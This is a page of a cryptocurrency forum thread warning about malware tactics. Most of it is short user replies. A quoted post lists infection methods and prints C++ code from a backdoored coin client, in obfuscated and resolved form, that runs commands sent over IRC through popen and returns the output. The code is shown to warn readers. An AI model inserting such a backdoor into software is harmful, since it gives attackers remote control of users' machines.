Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 22. (Read 835397 times)
March 07, 2018, 08:57:39 PM
How the hell are the malwares doing edition to forums post? It can only be changed by the participants though
March 07, 2018, 07:54:19 PM
I have not seen a reply in a while. Has there been less malware or is this still a major concern?
March 07, 2018, 02:08:42 PM
As a member of Newbie it is a terrific and discussing matter for me. I think do we need to be beware of increasingly sophisticated malware infection attempts after moving we can also earn easily coin as well bit coin forum help and I hope to block all malware to protect and save our cirrency
March 07, 2018, 10:34:31 AM
This is terrible, I really thank you, because I almost caught, and now I start to install Adblock, I hope to block all the malwares from online websites.
I'm also was nearly caught with that scammers, also you can use not only adblock for this, adguard works good too, and blocking more, then adblock, as I see March 06, 2018, 10:00:25 PM
Seriously? Is this the state of btcs now? then I am gonna quit from it.
March 06, 2018, 05:34:04 PM
Just seeing this. Thanks for the security info. I will try to be careful with any downloads and website visits. Hackers are on the rampage nowadays
March 06, 2018, 03:53:48 PM
somebody took my ether today from mew. how can that be possible?
Maybe you were connected on the wrong MEW, I mean a fake site. You should follow security instructions from MEW
DON'T GET PHISHED, please! 🎣 Thank you! 🤗
1. BOOKMARK MYETHERWALLET.COM 2. INSTALL EAL or MetaMask or Cryptonite
March 06, 2018, 01:53:37 PM
somebody took my ether today from mew. how can that be possible?
March 06, 2018, 10:13:35 AM
Now a days a lot of phishing and malware infected hacking attempts are happening
due to bad guys who want to steel your personal information specially private keys.
Block chain technology is a good technology but still it has a lot of problems that
need to be addressed. I want in every cryptocurrency wallet there should be
double factor authentication key that work with Google authenticator.
due to bad guys who want to steel your personal information specially private keys.
Block chain technology is a good technology but still it has a lot of problems that
need to be addressed. I want in every cryptocurrency wallet there should be
double factor authentication key that work with Google authenticator.
March 06, 2018, 10:09:36 AM
Now a days a lot of phishing and malware infected hacking attempts are happening due to bad guys
who want to steel your personal information specially private keys. Block chain technology is a good
technology but still it has a lot of problems that need to be addressed. I want in every cryptocurrency
wallet there should be double factor authentication key that work with Google authenticator.
who want to steel your personal information specially private keys. Block chain technology is a good
technology but still it has a lot of problems that need to be addressed. I want in every cryptocurrency
wallet there should be double factor authentication key that work with Google authenticator.
March 06, 2018, 09:48:33 AM
I was thinking if there is way to automatic delete any Malware link post on this forum so that we may not even get to open the link.
You can't detect if an URL is malicious or not.
Either all URL are ban or people are very careful.
March 05, 2018, 06:19:46 AM
I was thinking if there is way to automatic delete any Malware link post on this forum so that we may not even get to open the link.
March 04, 2018, 10:11:51 PM
Yes I was totally aware of it
March 04, 2018, 10:35:43 AM
This is terrible, I really thank you, because I almost caught, and now I start to install Adblock, I hope to block all the malwares from online websites.
March 04, 2018, 05:44:19 AM
Thank you very much for your precious info; I'm really stunned, as I never thought there were so many ways to be scammed 
Your post made me to think in a paranoid way, and I just wondered if we can really trust antimalware softwares: how can we be sure that THEY don't put something malicious, or don't scan for private keys?
It seems that we are really in an electronic far west, and probably the next big battle will be in the field of security.
Your post made me to think in a paranoid way, and I just wondered if we can really trust antimalware softwares: how can we be sure that THEY don't put something malicious, or don't scan for private keys?
It seems that we are really in an electronic far west, and probably the next big battle will be in the field of security.
March 04, 2018, 05:32:03 AM
we need say thanks U.. 
) clap clpap
) clap clpap March 03, 2018, 11:29:50 PM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
Don't forget airship registration, asking for private keys.. I sent them mones and luckily found out immediately after I sent it.. and move my coin out the wallet and created a new wallet.
March 03, 2018, 06:18:29 PM
This is very informative especially to newbies like me. Thank you. Reading all the threads. I need to add security measures.
March 03, 2018, 02:56:14 AM
you think faucet sites send malware ?
March 03, 2018, 12:32:27 AM
Cant you give anything new? It was prevailing from a very old times in btcs
Jump to: